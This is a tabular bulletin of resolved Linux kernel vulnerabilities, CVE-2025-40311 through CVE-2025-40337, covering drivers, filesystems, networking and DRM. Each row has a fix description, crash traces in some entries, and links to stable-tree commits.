| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/habanalabs: support mapping cb with vmalloc-backed coherent memory When IOMMU is enabled, dma_alloc_coherent() with GFP_USER may return addresses from the vmalloc range. If such an address is mapped without VM_MIXEDMAP, vm_insert_page() will trigger a BUG_ON due to the VM_PFNMAP restriction. Fix this by checking for vmalloc addresses and setting VM_MIXEDMAP in the VMA before mapping. This ensures safe mapping and avoids kernel crashes. The memory is still driver-allocated and cannot be accessed directly by userspace. | 2025-12-08 | not yet calculated | CVE-2025-40311 | https://git.kernel.org/stable/c/7ec8ac9f73d4a9438c2186768d6de27ace37531e https://git.kernel.org/stable/c/d1dfe21a332d38a6a09658ec29a55940afb5fe36 https://git.kernel.org/stable/c/73c7c2cdb442fc4160d2a2a4bfffbd162af06cb9 https://git.kernel.org/stable/c/513024d5a0e34fd34247043f1876b6138ca52847 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jfs: Verify inode mode when loading from disk The inode mode loaded from corrupted disk can be invalid. Do like what commit 0a9e74051313 ("isofs: Verify inode mode when loading from disk") does. | 2025-12-08 | not yet calculated | CVE-2025-40312 | https://git.kernel.org/stable/c/19cce65709a8a2966203653028d9004e28e85bd5 https://git.kernel.org/stable/c/fabc1348bb8fe6bc80850014ee94bd89945f7f4d https://git.kernel.org/stable/c/46c76cfa17d1828c1a889cb54cb11d5ef3dfbc0f https://git.kernel.org/stable/c/2870a7dec49ccdc3f6ae35da8f5d6737f21133a8 https://git.kernel.org/stable/c/ce054a366c54992185c9514e489a14f145b10c29 https://git.kernel.org/stable/c/1795277a4e98d82e6451544d43695540cee042ea https://git.kernel.org/stable/c/8d6a9cbd276b3b85da0e7e98208f89416fed9265 https://git.kernel.org/stable/c/7a5aa54fba2bd591b22b9b624e6baa9037276986 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: pretend $Extend records as regular files Since commit af153bb63a33 ("vfs: catch invalid modes in may_open()") requires any inode be one of S_IFDIR/S_IFLNK/S_IFREG/S_IFCHR/S_IFBLK/ S_IFIFO/S_IFSOCK type, use S_IFREG for $Extend records. | 2025-12-08 | not yet calculated | CVE-2025-40313 | https://git.kernel.org/stable/c/63eb6730ce0604d3eacf036c2f68ea70b068317c https://git.kernel.org/stable/c/78d46f5276ed3589aaaa435580068c5b62efc921 https://git.kernel.org/stable/c/17249b2a65274f73ed68bcd1604e08a60fd8a278 https://git.kernel.org/stable/c/37f65e68ba9852dc51c78dbb54a9881c3f0fe4f7 https://git.kernel.org/stable/c/57534db1bbc4ca772393bb7d92e69d5e7b9051cf https://git.kernel.org/stable/c/4e8011ffec79717e5fdac43a7e79faf811a384b7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget In the __cdnsp_gadget_init() and cdnsp_gadget_exit() functions, the gadget structure (pdev->gadget) was freed before its endpoints. The endpoints are linked via the ep_list in the gadget structure. Freeing the gadget first leaves dangling pointers in the endpoint list. When the endpoints are subsequently freed, this results in a use-after-free. Fix: By separating the usb_del_gadget_udc() operation into distinct "del" and "put" steps, cdnsp_gadget_free_endpoints() can be executed prior to the final release of the gadget structure with usb_put_gadget(). A patch similar to bb9c74a5bd14("usb: dwc3: gadget: Free gadget structure only after freeing endpoints"). | 2025-12-08 | not yet calculated | CVE-2025-40314 | https://git.kernel.org/stable/c/0cf9a50af91fbdac3849f8d950e883a3eaa3ecea https://git.kernel.org/stable/c/37158ce6ba964b62d1e3eebd11f03c6900a52dd1 https://git.kernel.org/stable/c/ea37884097a0931abb8e11e40eacfb25e9fdb5e9 https://git.kernel.org/stable/c/9c52f01429c377a2d32cafc977465f37b5384f77 https://git.kernel.org/stable/c/fdf573c517627a96f5040f988e9b21267806be5c https://git.kernel.org/stable/c/87c5ff5615dc0a37167e8faf3adeeddc6f1344a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_fs: Fix epfile null pointer access after ep enable. A race condition occurs when ffs_func_eps_enable() runs concurrently with ffs_data_reset(). The ffs_data_clear() called in ffs_data_reset() sets ffs->epfiles to NULL before resetting ffs->eps_count to 0, leading to a NULL pointer dereference when accessing epfile->ep in ffs_func_eps_enable() after successful usb_ep_enable(). The ffs->epfiles pointer is set to NULL in both ffs_data_clear() and ffs_data_close() functions, and its modification is protected by the spinlock ffs->eps_lock. And the whole ffs_func_eps_enable() function is also protected by ffs->eps_lock. Thus, add NULL pointer handling for ffs->epfiles in the ffs_func_eps_enable() function to fix issues | 2025-12-08 | not yet calculated | CVE-2025-40315 | https://git.kernel.org/stable/c/b00d2572c16e8e59e979960d3383c2ae9cebd195 https://git.kernel.org/stable/c/1c0dbd240be3f87cac321b14e17979b7e9cb6a8f https://git.kernel.org/stable/c/9ec40fba7357df2d36f4c2e2f3b9b1a4fba0a272 https://git.kernel.org/stable/c/c53e90563bc148e4e0ad09fe130ba2246d426ea6 https://git.kernel.org/stable/c/fc1141a530dfc91f0ee19b7f422a2d24829584bc https://git.kernel.org/stable/c/d62b808d5c68a931ad0849a00a5e3be3dd7e0019 https://git.kernel.org/stable/c/30880e9df27332403dd638a82c27921134b3630b https://git.kernel.org/stable/c/cfd6f1a7b42f62523c96d9703ef32b0dbc495ba4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Fix device use-after-free on unbind A recent change fixed device reference leaks when looking up drm platform device driver data during bind() but failed to remove a partial fix which had been added by commit 80805b62ea5b ("drm/mediatek: Fix kobject put for component sub-drivers"). This results in a reference imbalance on component bind() failures and on unbind() which could lead to a user-after-free. Make sure to only drop the references after retrieving the driver data by effectively reverting the previous partial fix. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference. | 2025-12-08 | not yet calculated | CVE-2025-40316 | https://git.kernel.org/stable/c/a5a896f8315de358a2932e2c23c42d550256046a https://git.kernel.org/stable/c/0142fe895986addf35885b43440718e567121155 https://git.kernel.org/stable/c/8ba827e09eb586e952d10e39406fa02d10bb591e https://git.kernel.org/stable/c/926d002e6d7e2f1fd5c1b53cf6208153ee7d380d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regmap: slimbus: fix bus_context pointer in regmap init calls Commit 4e65bda8273c ("ASoC: wcd934x: fix error handling in wcd934x_codec_parse_data()") revealed the problem in the slimbus regmap. That commit breaks audio playback, for instance, on sdm845 Thundercomm Dragonboard 845c board: Unable to handle kernel paging request at virtual address ffff8000847cbad4 ... CPU: 5 UID: 0 PID: 776 Comm: aplay Not tainted 6.18.0-rc1-00028-g7ea30958b305 #11 PREEMPT Hardware name: Thundercomm Dragonboard 845c (DT) ... Call trace: slim_xfer_msg+0x24/0x1ac [slimbus] (P) slim_read+0x48/0x74 [slimbus] regmap_slimbus_read+0x18/0x24 [regmap_slimbus] _regmap_raw_read+0xe8/0x174 _regmap_bus_read+0x44/0x80 _regmap_read+0x60/0xd8 _regmap_update_bits+0xf4/0x140 _regmap_select_page+0xa8/0x124 _regmap_raw_write_impl+0x3b8/0x65c _regmap_bus_raw_write+0x60/0x80 _regmap_write+0x58/0xc0 regmap_write+0x4c/0x80 wcd934x_hw_params+0x494/0x8b8 [snd_soc_wcd934x] snd_soc_dai_hw_params+0x3c/0x7c [snd_soc_core] __soc_pcm_hw_params+0x22c/0x634 [snd_soc_core] dpcm_be_dai_hw_params+0x1d4/0x38c [snd_soc_core] dpcm_fe_dai_hw_params+0x9c/0x17c [snd_soc_core] snd_pcm_hw_params+0x124/0x464 [snd_pcm] snd_pcm_common_ioctl+0x110c/0x1820 [snd_pcm] snd_pcm_ioctl+0x34/0x4c [snd_pcm] __arm64_sys_ioctl+0xac/0x104 invoke_syscall+0x48/0x104 el0_svc_common.constprop.0+0x40/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xec el0t_64_sync_handler+0xa0/0xf0 el0t_64_sync+0x198/0x19c The __devm_regmap_init_slimbus() started to be used instead of __regmap_init_slimbus() after the commit mentioned above and turns out the incorrect bus_context pointer (3rd argument) was used in __devm_regmap_init_slimbus(). It should be just "slimbus" (which is equal to &slimbus->dev). Correct it. The wcd934x codec seems to be the only or the first user of devm_regmap_init_slimbus() but we should fix it till the point where __devm_regmap_init_slimbus() was introduced therefore two "Fixes" tags. While at this, also correct the same argument in __regmap_init_slimbus(). | 2025-12-08 | not yet calculated | CVE-2025-40317 | https://git.kernel.org/stable/c/c0f05129e5734ff3fd14b2c242709314d9ca5433 https://git.kernel.org/stable/c/02d3041caaa3fe4dd69e5a8afd1ac6b918ddc6a1 https://git.kernel.org/stable/c/d979639f099c6e51f06ce4dd8d8e56364d6c17ba https://git.kernel.org/stable/c/8143e4075d131c528540417a51966f6697be14eb https://git.kernel.org/stable/c/2664bfd8969d1c43dcbe3ea313f130dfa6b74f4c https://git.kernel.org/stable/c/a16e92f8d7dc7371e68f17a9926cb92d2244be7b https://git.kernel.org/stable/c/b65f3303349eaee333e47d2a99045aa12fa0c3a7 https://git.kernel.org/stable/c/434f7349a1f00618a620b316f091bd13a12bc8d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: fix race in hci_cmd_sync_dequeue_once hci_cmd_sync_dequeue_once() does lookup and then cancel the entry under two separate lock sections. Meanwhile, hci_cmd_sync_work() can also delete the same entry, leading to double list_del() and "UAF". Fix this by holding cmd_sync_work_lock across both lookup and cancel, so that the entry cannot be removed concurrently. | 2025-12-08 | not yet calculated | CVE-2025-40318 | https://git.kernel.org/stable/c/0a94f7e017438935c09ef833a1aa908ad9875213 https://git.kernel.org/stable/c/932c0a4f77ac13e526fdd5b42914d29c9821d389 https://git.kernel.org/stable/c/ae76cf6c2c842944c6514c57df54d728f1916553 https://git.kernel.org/stable/c/9cd536970192b72257afcdfba0bfc09993e6f19c https://git.kernel.org/stable/c/09b0cd1297b4dbfe736aeaa0ceeab2265f47f772 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Sync pending IRQ work before freeing ring buffer Fix a race where irq_work can be queued in bpf_ringbuf_commit() but the ring buffer is freed before the work executes. In the syzbot reproducer, a BPF program attached to sched_switch triggers bpf_ringbuf_commit(), queuing an irq_work. If the ring buffer is freed before this work executes, the irq_work thread may accesses freed memory. Calling `irq_work_sync(&rb->work)` ensures that all pending irq_work complete before freeing the buffer. | 2025-12-08 | not yet calculated | CVE-2025-40319 | https://git.kernel.org/stable/c/47626748a2a00068dbbd5836d19076637b4e235b https://git.kernel.org/stable/c/de2ce6b14bc3e565708a39bdba3ef9162aeffc72 https://git.kernel.org/stable/c/e1828c7a8d8135e21ff6adaaa9458c32aae13b11 https://git.kernel.org/stable/c/6451141103547f4efd774e912418a3b4318046c6 https://git.kernel.org/stable/c/10ca3b2eec384628bc9f5d8190aed9427ad2dde6 https://git.kernel.org/stable/c/430e15544f11f8de26b2b5109c7152f71b78295e https://git.kernel.org/stable/c/4e9077638301816a7d73fa1e1b4c1db4a7e3b59c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential cfid UAF in smb2_query_info_compound When smb2_query_info_compound() retries, a previously allocated cfid may have been freed in the first attempt. Because cfid wasn't reset on replay, later cleanup could act on a stale pointer, leading to a potential use-after-free. Reinitialize cfid to NULL under the replay label. Example trace (trimmed): refcount_t: underflow; use-after-free. WARNING: CPU: 1 PID: 11224 at ../lib/refcount.c:28 refcount_warn_saturate+0x9c/0x110 [...] RIP: 0010:refcount_warn_saturate+0x9c/0x110 [...] Call Trace: <TASK> smb2_query_info_compound+0x29c/0x5c0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] ? step_into+0x10d/0x690 ? __legitimize_path+0x28/0x60 smb2_queryfs+0x6a/0xf0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] smb311_queryfs+0x12d/0x140 [cifs f90b72658819bd21c94769b6a652029a07a7172f] ? kmem_cache_alloc+0x18a/0x340 ? getname_flags+0x46/0x1e0 cifs_statfs+0x9f/0x2b0 [cifs f90b72658819bd21c94769b6a652029a07a7172f] statfs_by_dentry+0x67/0x90 vfs_statfs+0x16/0xd0 user_statfs+0x54/0xa0 __do_sys_statfs+0x20/0x50 do_syscall_64+0x58/0x80 | 2025-12-08 | not yet calculated | CVE-2025-40320 | https://git.kernel.org/stable/c/939c4e33005e2a56ea8fcedddf0da92df864bd3b https://git.kernel.org/stable/c/327f89c21601ebb7889f8c97754b76f08ce95a0c https://git.kernel.org/stable/c/b556c278d43f4707a9073ca74d55581b4f279806 https://git.kernel.org/stable/c/5c76f9961c170552c1d07c830b5e145475151600 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode Currently, whenever there is a need to transmit an Action frame, the brcmfmac driver always uses the P2P vif to send the "actframe" IOVAR to firmware. The P2P interfaces were available when wpa_supplicant is managing the wlan interface. However, the P2P interfaces are not created/initialized when only hostapd is managing the wlan interface. And if hostapd receives an ANQP Query REQ Action frame even from an un-associated STA, the brcmfmac driver tries to use an uninitialized P2P vif pointer for sending the IOVAR to firmware. This NULL pointer dereferencing triggers a driver crash. [ 1417.074538] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 [...] [ 1417.075188] Hardware name: Raspberry Pi 4 Model B Rev 1.5 (DT) [...] [ 1417.075653] Call trace: [ 1417.075662] brcmf_p2p_send_action_frame+0x23c/0xc58 [brcmfmac] [ 1417.075738] brcmf_cfg80211_mgmt_tx+0x304/0x5c0 [brcmfmac] [ 1417.075810] cfg80211_mlme_mgmt_tx+0x1b0/0x428 [cfg80211] [ 1417.076067] nl80211_tx_mgmt+0x238/0x388 [cfg80211] [ 1417.076281] genl_family_rcv_msg_doit+0xe0/0x158 [ 1417.076302] genl_rcv_msg+0x220/0x2a0 [ 1417.076317] netlink_rcv_skb+0x68/0x140 [ 1417.076330] genl_rcv+0x40/0x60 [ 1417.076343] netlink_unicast+0x330/0x3b8 [ 1417.076357] netlink_sendmsg+0x19c/0x3f8 [ 1417.076370] __sock_sendmsg+0x64/0xc0 [ 1417.076391] ____sys_sendmsg+0x268/0x2a0 [ 1417.076408] ___sys_sendmsg+0xb8/0x118 [ 1417.076427] __sys_sendmsg+0x90/0xf8 [ 1417.076445] __arm64_sys_sendmsg+0x2c/0x40 [ 1417.076465] invoke_syscall+0x50/0x120 [ 1417.076486] el0_svc_common.constprop.0+0x48/0xf0 [ 1417.076506] do_el0_svc+0x24/0x38 [ 1417.076525] el0_svc+0x30/0x100 [ 1417.076548] el0t_64_sync_handler+0x100/0x130 [ 1417.076569] el0t_64_sync+0x190/0x198 [ 1417.076589] Code: f9401e80 aa1603e2 f9403be1 5280e483 (f9400000) Fix this, by always using the vif corresponding to the wdev on which the Action frame Transmission request was initiated by the userspace. This way, even if P2P vif is not available, the IOVAR is sent to firmware on AP vif and the ANQP Query RESP Action frame is transmitted without crashing the driver. Move init_completion() for "send_af_done" from brcmf_p2p_create_p2pdev() to brcmf_p2p_attach(). Because the former function would not get executed when only hostapd is managing wlan interface, and it is not safe to do reinit_completion() later in brcmf_p2p_tx_action_frame(), without any prior init_completion(). And in the brcmf_p2p_tx_action_frame() function, the condition check for P2P Presence response frame is not needed, since the wpa_supplicant is properly sending the P2P Presense Response frame on the P2P-GO vif instead of the P2P-Device vif. [Cc stable] | 2025-12-08 | not yet calculated | CVE-2025-40321 | https://git.kernel.org/stable/c/c863b9c7b4e9af0b7931cb791ec91971a50f1a25 https://git.kernel.org/stable/c/e1fc9afcce9139791260f962541282d47fbb508d https://git.kernel.org/stable/c/55f60a72a178909ece4e32987e4c642ba57e1cf4 https://git.kernel.org/stable/c/c2b0f8d3e7358c33d90f0e62765d474f25f26a45 https://git.kernel.org/stable/c/64e3175d1c8a3bea02032e7c9d1befd5f43786fa https://git.kernel.org/stable/c/a6eed58249e7d60f856900e682992300f770f64b https://git.kernel.org/stable/c/dbc7357b6aae686d9404e1dd7e2e6cf92c3a1b5a https://git.kernel.org/stable/c/3776c685ebe5f43e9060af06872661de55e80b9a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: bitblit: bound-check glyph index in bit_putcs* bit_putcs_aligned()/unaligned() derived the glyph pointer from the character value masked by 0xff/0x1ff, which may exceed the actual font's glyph count and read past the end of the built-in font array. Clamp the index to the actual glyph count before computing the address. This fixes a global out-of-bounds read reported by syzbot. | 2025-12-08 | not yet calculated | CVE-2025-40322 | https://git.kernel.org/stable/c/a10cede006f9614b465cf25609a8753efbfd45cc https://git.kernel.org/stable/c/0998a6cb232674408a03e8561dc15aa266b2f53b https://git.kernel.org/stable/c/db5c9a162d2f42bcc842b76b3d935dcc050a0eec https://git.kernel.org/stable/c/c12003bf91fdff381c55ef54fef3e961a5af2545 https://git.kernel.org/stable/c/9ba1a7802ca9a2590cef95b253e6526f4364477f https://git.kernel.org/stable/c/901f44227072be60812fe8083e83e1533c04eed1 https://git.kernel.org/stable/c/efaf89a75a29b2d179bf4fe63ca62852e93ad620 https://git.kernel.org/stable/c/18c4ef4e765a798b47980555ed665d78b71aeadf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbcon: Set fb_display[i]->mode to NULL when the mode is released Recently, we discovered the following issue through syzkaller: BUG: KASAN: slab-use-after-free in fb_mode_is_equal+0x285/0x2f0 Read of size 4 at addr ff11000001b3c69c by task syz.xxx ... Call Trace: <TASK> dump_stack_lvl+0xab/0xe0 print_address_description.constprop.0+0x2c/0x390 print_report+0xb9/0x280 kasan_report+0xb8/0xf0 fb_mode_is_equal+0x285/0x2f0 fbcon_mode_deleted+0x129/0x180 fb_set_var+0xe7f/0x11d0 do_fb_ioctl+0x6a0/0x750 fb_ioctl+0xe0/0x140 __x64_sys_ioctl+0x193/0x210 do_syscall_64+0x5f/0x9c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Based on experimentation and analysis, during framebuffer unregistration, only the memory of fb_info->modelist is freed, without setting the corresponding fb_display[i]->mode to NULL for the freed modes. This leads to UAF issues during subsequent accesses. Here's an example of reproduction steps: 1. With /dev/fb0 already registered in the system, load a kernel module to register a new device /dev/fb1; 2. Set fb1's mode to the global fb_display[] array (via FBIOPUT_CON2FBMAP); 3. Switch console from fb to VGA (to allow normal rmmod of the ko); 4. Unload the kernel module, at this point fb1's modelist is freed, leaving a wild pointer in fb_display[]; 5. Trigger the bug via system calls through fb0 attempting to delete a mode from fb0. Add a check in do_unregister_framebuffer(): if the mode to be freed exists in fb_display[], set the corresponding mode pointer to NULL. | 2025-12-08 | not yet calculated | CVE-2025-40323 | https://git.kernel.org/stable/c/4ac18f0e6a6d599ca751c4cd98e522afc8e3d4eb https://git.kernel.org/stable/c/468f78276a37f4c6499385a4ce28f4f57be6655d https://git.kernel.org/stable/c/c079d42f70109512eee49123a843be91d8fa133f https://git.kernel.org/stable/c/de89d19f4f30d9a8de87b9d08c1bd35cb70576d8 https://git.kernel.org/stable/c/a1f3058930745d2b938b6b4f5bd9630dc74b26b7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Fix crash in nfsd4_read_release() When tracing is enabled, the trace_nfsd_read_done trace point crashes during the pynfs read.testNoFh test. | 2025-12-08 | not yet calculated | CVE-2025-40324 | https://git.kernel.org/stable/c/930cb4fe3ab4061be31f20ee30bb72a66f7bb6d1 https://git.kernel.org/stable/c/375fdd8993cecc48afa359728a6e70b280dde1c8 https://git.kernel.org/stable/c/2ac46606b2cc49e78d8e3d8f2685e79e9ba73020 https://git.kernel.org/stable/c/03524ccff698d4a77d096ed529073d91f5edee5d https://git.kernel.org/stable/c/a4948875ed0599c037dc438c11891c9012721b1d https://git.kernel.org/stable/c/8f244b773c63fa480c9a3bd1ae04f5272f285e89 https://git.kernel.org/stable/c/abb1f08a2121dd270193746e43b2a9373db9ad84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Define actions for the new time_deleg FATTR4 attributes NFSv4 clients won't send legitimate GETATTR requests for these new attributes because they are intended to be used only with CB_GETATTR and SETATTR. But NFSD has to do something besides crashing if it ever sees a GETATTR request that queries these attributes. RFC 8881 Section 18.7.3 states: > The server MUST return a value for each attribute that the client > requests if the attribute is supported by the server for the > target file system. If the server does not support a particular > attribute on the target file system, then it MUST NOT return the > attribute value and MUST NOT set the attribute bit in the result > bitmap. The server MUST return an error if it supports an > attribute on the target but cannot obtain its value. In that case, > no attribute values will be returned. Further, RFC 9754 Section 5 states: > These new attributes are invalid to be used with GETATTR, VERIFY, > and NVERIFY, and they can only be used with CB_GETATTR and SETATTR > by a client holding an appropriate delegation. Thus there does not appear to be a specific server response mandated by specification. Taking the guidance that querying these attributes via GETATTR is "invalid", NFSD will return nfserr_inval, failing the request entirely. | 2025-12-08 | not yet calculated | CVE-2025-40326 | https://git.kernel.org/stable/c/d8f3f94dc950e7c62c96af432c26745885b0a18a https://git.kernel.org/stable/c/4f76435fd517981f01608678c06ad9718a86ee98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/core: Fix system hang caused by cpu-clock usage cpu-clock usage by the async-profiler tool can trigger a system hang, which got bisected back to the following commit by Octavia Togami: 18dbcbfabfff ("perf: Fix the POLL_HUP delivery breakage") causes this issue The root cause of the hang is that cpu-clock is a special type of SW event which relies on hrtimers. The __perf_event_overflow() callback is invoked from the hrtimer handler for cpu-clock events, and __perf_event_overflow() tries to call cpu_clock_event_stop() to stop the event, which calls htimer_cancel() to cancel the hrtimer. But that's a recursion into the hrtimer code from a hrtimer handler, which (unsurprisingly) deadlocks. To fix this bug, use hrtimer_try_to_cancel() instead, and set the PERF_HES_STOPPED flag, which causes perf_swevent_hrtimer() to stop the event once it sees the PERF_HES_STOPPED flag. [ mingo: Fixed the comments and improved the changelog. ] | 2025-12-09 | not yet calculated | CVE-2025-40327 | https://git.kernel.org/stable/c/6b8c512811644cf2f5eaf6f44e928683c54127f0 https://git.kernel.org/stable/c/eb3182ef0405ff2f6668fd3e5ff9883f60ce8801 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in smb2_close_cached_fid() find_or_create_cached_dir() could grab a new reference after kref_put() had seen the refcount drop to zero but before cfid_list_lock is acquired in smb2_close_cached_fid(), leading to use-after-free. Switch to kref_put_lock() so cfid_release() is called with cfid_list_lock held, closing that gap. | 2025-12-09 | not yet calculated | CVE-2025-40328 | https://git.kernel.org/stable/c/cb52d9c86d70298de0ab7c7953653898cbc0efd6 https://git.kernel.org/stable/c/065bd62412271a2d734810dd50336cae88c54427 https://git.kernel.org/stable/c/bdb596ceb4b7c3f28786a33840263728217fbcf5 https://git.kernel.org/stable/c/734e99623c5b65bf2c03e35978a0b980ebc3c2f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/sched: Fix deadlock in drm_sched_entity_kill_jobs_cb The Mesa issue referenced below pointed out a possible deadlock: [ 1231.611031] Possible interrupt unsafe locking scenario: [ 1231.611033] CPU0 CPU1 [ 1231.611034] ---- ---- [ 1231.611035] lock(&xa->xa_lock#17); [ 1231.611038] local_irq_disable(); [ 1231.611039] lock(&fence->lock); [ 1231.611041] lock(&xa->xa_lock#17); [ 1231.611044] <Interrupt> [ 1231.611045] lock(&fence->lock); [ 1231.611047] *** DEADLOCK *** In this example, CPU0 would be any function accessing job->dependencies through the xa_* functions that don't disable interrupts (eg: drm_sched_job_add_dependency(), drm_sched_entity_kill_jobs_cb()). CPU1 is executing drm_sched_entity_kill_jobs_cb() as a fence signalling callback so in an interrupt context. It will deadlock when trying to grab the xa_lock which is already held by CPU0. Replacing all xa_* usage by their xa_*_irq counterparts would fix this issue, but Christian pointed out another issue: dma_fence_signal takes fence.lock and so does dma_fence_add_callback. dma_fence_signal() // locks f1.lock -> drm_sched_entity_kill_jobs_cb() -> foreach dependencies -> dma_fence_add_callback() // locks f2.lock This will deadlock if f1 and f2 share the same spinlock. To fix both issues, the code iterating on dependencies and re-arming them is moved out to drm_sched_entity_kill_jobs_work(). [phasta: commit message nits] | 2025-12-09 | not yet calculated | CVE-2025-40329 | https://git.kernel.org/stable/c/70150b9443dddf02157d821c68abf438f55a2e8e https://git.kernel.org/stable/c/0d63031ee4a57be0252cb9a4e09ae921c75cece9 https://git.kernel.org/stable/c/3e8ada4fd838e3fd2cca94000dac054f3a347c01 https://git.kernel.org/stable/c/487df8b698345dd5a91346335f05170ed5f29d4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Shutdown FW DMA in bnxt_shutdown() The netif_close() call in bnxt_shutdown() only stops packet DMA. There may be FW DMA for trace logging (recently added) that will continue. If we kexec to a new kernel, the DMA will corrupt memory in the new kernel. Add bnxt_hwrm_func_drv_unrgtr() to unregister the driver from the FW. This will stop the FW DMA. In case the call fails, call pcie_flr() to reset the function and stop the DMA. | 2025-12-09 | not yet calculated | CVE-2025-40330 | https://git.kernel.org/stable/c/1a8a15c3f71d1199d510ccba4bc201cbd2204048 https://git.kernel.org/stable/c/bc7208ca805ae6062f353a4753467d913d963bc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: Prevent TOCTOU out-of-bounds write For the following path not holding the sock lock, sctp_diag_dump() -> sctp_for_each_endpoint() -> sctp_ep_dump() make sure not to exceed bounds in case the address list has grown between buffer allocation (time-of-check) and write (time-of-use). | 2025-12-09 | not yet calculated | CVE-2025-40331 | https://git.kernel.org/stable/c/b106a68df0650b694b254427cd9250c04500edd3 https://git.kernel.org/stable/c/3006959371007fc2eae4a078f823c680fa52de1a https://git.kernel.org/stable/c/72e3fea68eac8d088e44c3dd954e843478e9240e https://git.kernel.org/stable/c/584307275b2048991b2e8984962189b6cc0a9b85 https://git.kernel.org/stable/c/c9119f243d9c0da3c3b5f577a328de3e7ffd1b42 https://git.kernel.org/stable/c/2fe08fcaacb7eb019fa9c81db39b2214de216677 https://git.kernel.org/stable/c/89eac1e150dbd42963e13d23828cb8c4e0763196 https://git.kernel.org/stable/c/95aef86ab231f047bb8085c70666059b58f53c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix mmap write lock not release If mmap write lock is taken while draining retry fault, mmap write lock is not released because svm_range_restore_pages calls mmap_read_unlock then returns. This causes deadlock and system hangs later because mmap read or write lock cannot be taken. Downgrade mmap write lock to read lock if draining retry fault fix this bug. | 2025-12-09 | not yet calculated | CVE-2025-40332 | https://git.kernel.org/stable/c/e2105ba1c262dcaa9573f11844b6e1e1ca762c3f https://git.kernel.org/stable/c/f7569ef1cf978aa87aa81b5e9bf40a77497f3685 https://git.kernel.org/stable/c/7574f30337e19045f03126b4c51f525b84e5049e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix infinite loop in __insert_extent_tree() When we get wrong extent info data, and look up extent_node in rb tree, it will cause infinite loop (CONFIG_F2FS_CHECK_FS=n). Avoiding this by return NULL and print some kernel messages in that case. | 2025-12-09 | not yet calculated | CVE-2025-40333 | https://git.kernel.org/stable/c/765f8816d3959ef1f3f7f85e2af748594d091f40 https://git.kernel.org/stable/c/c0b9951bb2668d67eb4817bb23fc109abc08c075 https://git.kernel.org/stable/c/f4c31adcb2a0556f43776d4e51a67de88d7fb9ee https://git.kernel.org/stable/c/23361bd54966b437e1ed3eb1a704572f4b279e58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate userq buffer virtual address and size It needs to validate the userq object virtual address to determine whether it is residented in a valid vm mapping. | 2025-12-09 | not yet calculated | CVE-2025-40334 | https://git.kernel.org/stable/c/5a577de86c4a1c67ca405571d6ef84e65c6897d1 https://git.kernel.org/stable/c/9e46b8bb0539d7bc9a9e7b3072fa4f6082490392 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate userq input args This will help on validating the userq input args, and rejecting for the invalid userq request at the IOCTLs first place. | 2025-12-09 | not yet calculated | CVE-2025-40335 | https://git.kernel.org/stable/c/bdaa7ad3a5bb606d7dbd5c8627dc7efcb2392eb9 https://git.kernel.org/stable/c/219be4711a1ba788bc2a9fafc117139d133e5fea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/gpusvm: fix hmm_pfn_to_map_order() usage Handle the case where the hmm range partially covers a huge page (like 2M), otherwise we can potentially end up doing something nasty like mapping memory which is outside the range, and maybe not even mapped by the mm. Fix is based on the xe userptr code, which in a future patch will directly use gpusvm, so needs alignment here. v2: - Add kernel-doc (Matt B) - s/fls/ilog2/ (Thomas) | 2025-12-09 | not yet calculated | CVE-2025-40336 | https://git.kernel.org/stable/c/08e9fd78ba1b9e95141181c69cc51795c9888157 https://git.kernel.org/stable/c/c50729c68aaf93611c855752b00e49ce1fdd1558 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stmmac: Correctly handle Rx checksum offload errors The stmmac_rx function would previously set skb->ip_summed to CHECKSUM_UNNECESSARY if hardware checksum offload (CoE) was enabled and the packet was of a known IP ethertype. However, this logic failed to check if the hardware had actually reported a checksum error. The hardware status, indicating a header or payload checksum failure, was being ignored at this stage. This could cause corrupt packets to be passed up the network stack as valid. This patch corrects the logic by checking the `csum_none` status flag, which is set when the hardware reports a checksum error. If this flag is set, skb->ip_summed is now correctly set to CHECKSUM_NONE, ensuring the kernel's network stack will perform its own validation and properly handle the corrupt packet. | 2025-12-09 | not yet calculated | CVE-2025-40337 | https://git.kernel.org/stable/c/63fbe0e6413279d5ea5842e2423e351ded547683 https://git.kernel.org/stable/c/719fcdf29051f7471d5d433475af76219019d33d https://git.kernel.org/stable/c/1aa319e0f12d2d761a31556b82a5852c98eb0bea 